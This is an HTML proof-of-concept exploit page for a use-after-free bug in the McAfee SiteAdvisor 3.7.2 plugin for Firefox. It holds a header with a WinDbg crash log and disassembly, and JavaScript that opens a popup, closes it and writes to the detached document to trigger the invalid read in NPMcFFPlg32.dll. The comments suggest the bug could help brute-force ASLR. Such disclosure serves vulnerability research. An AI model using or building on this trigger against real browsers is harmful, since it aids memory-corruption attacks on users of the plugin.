<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
<meta name="generator" content="PSPad editor, www.pspad.com">
<title>McAfee SiteAdvisor 3.7.2 for Firefox Use-After-Free PoC</title>
</head>
<body>
<script>
/*
Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
Author: Marcin Ressel
Twitter: https://twitter.com/m_ressel
Affected module: NPMcFFPlg32.dll
Affected product: McAfee SiteAdvisor 3.7.2
Tested on: Windows 8.1 (x64) and Firefox 38.0.5
Homepage: https://www.siteadvisor.com/
Note: this vulnerability could potentially be used to brute-force module base addresses in memory
and so bypass ASLR/DEP, because the bug has no negative impact on the web-browser process:
Firefox does not crash after the UAF is triggered inside the McAfee plugin (NPMcFFPlg32.dll).
The access violation below is reported as a first-chance exception, i.e. it is raised before
any handler sees it and may well be caught and swallowed. Caveat: this PoC only demonstrates
the invalid read; it does not show a way for script to observe the outcome of that read, which
a practical ASLR brute-force would require.
0:107> !gflag
Current NtGlobalFlag contents: 0x02001800
htg - Enable heap tagging
ust - Create user mode stack trace database
hpa - Place heap allocations at ends of pages (page heap; presumably this is why the read
from the freed block faults immediately instead of silently returning stale data)
0:107> g
(1d68.1b54): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
NPMcFFPlg32!CreateFFScriptable+0x141:
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
...
6f40437a 8b02 mov eax,dword ptr [edx]
6f40437c 85c0 test eax,eax
6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
6f404380 8b00 mov eax,dword ptr [eax]
6f404382 8b4808 mov ecx,dword ptr [eax+8]
6f404385 8b4004 mov eax,dword ptr [eax+4]
6f404388 49 dec ecx
6f404389 234a08 and ecx,dword ptr [edx+8]
6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
6f40438f 8b00 mov eax,dword ptr [eax]
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
6f404396 8d45d0 lea eax,[ebp-30h]
6f404399 50 push eax
6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f40439f 8bd0 mov edx,eax
6f4043a1 8b02 mov eax,dword ptr [edx]
6f4043a3 85c0 test eax,eax
6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
6f4043a7 8b00 mov eax,dword ptr [eax]
6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
6f4043ac 8b4004 mov eax,dword ptr [eax+4]
6f4043af 49 dec ecx
6f4043b0 234a08 and ecx,dword ptr [edx+8]
6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
6f4043b6 8d45c4 lea eax,[ebp-3Ch]
6f4043b9 50 push eax
6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f4043bf 8bd0 mov edx,eax
...
*/
var win = null; // handle to the popup opened below; crash() reads its document and close()s it
// Trigger path: take a reference to the popup's document, close the popup
// (presumably this is what frees the plugin-side object), then keep touching
// the detached document's string properties so that the plugin walks into the
// stale pointer in CreateFFScriptable (see the disassembly in the header).
function crash()
{
    var target = win.document;
    win.close();
    for (var prop in target)
    {
        if (typeof target[prop] != 'string')
        {
            continue;
        }
        // best-effort write: read-only or throwing setters are simply skipped
        try { target[prop] = "CCCC"; } catch (err) {}
    }
}
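// Open the victim popup. window.open() returns null when a popup blocker
// intervenes, in which case the original code died with an unhelpful TypeError
// on the onload assignment; fail with an explicit message instead.
// NOTE(review): the header lists Firefox 38.0.5 as the tested version; newer
// Firefox releases refuse top-level navigation to data: URLs, so the popup may
// never load (and onload may never fire) there.
win = window.open('data:text/html,', '', 'width=20,height=20');
if (!win)
{
    throw new Error('window.open() returned null: disable the popup blocker and reload');
}
win.onload = crash;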
</script>
</body>
</html>